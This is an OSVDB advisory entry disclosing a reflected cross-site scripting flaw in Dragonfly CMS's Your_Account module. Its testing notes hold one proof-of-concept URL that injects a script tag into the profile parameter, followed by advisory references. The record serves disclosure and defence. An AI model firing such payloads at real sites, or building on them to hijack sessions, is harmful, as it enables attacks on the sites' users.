CPG Dragonfly CMS Your_Account Module profile Variable XSS

2005-03-29T13:20:10
ID OSVDB:23407
Type osvdb
Reporter OSVDB
Modified 2005-03-29T13:20:10

Description

Manual Testing Notes

http://[target]/index.php?name=Your_Account&profile=anyone"><script>alert('foo')</script>

References:

Vendor URL: http://www.cpgnuke.com/ Vendor Specific News/Changelog Entry: http://dragonflycms.org/Forums/viewtopic/t=14751.html Security Tracker: 1013573 Secunia Advisory ID:14748 Related OSVDB ID: 15089 Related OSVDB ID: 23406 Related OSVDB ID: 15090 Other Advisory URL: http://www.securiteam.com/unixfocus/5LP0L2KF5Q.html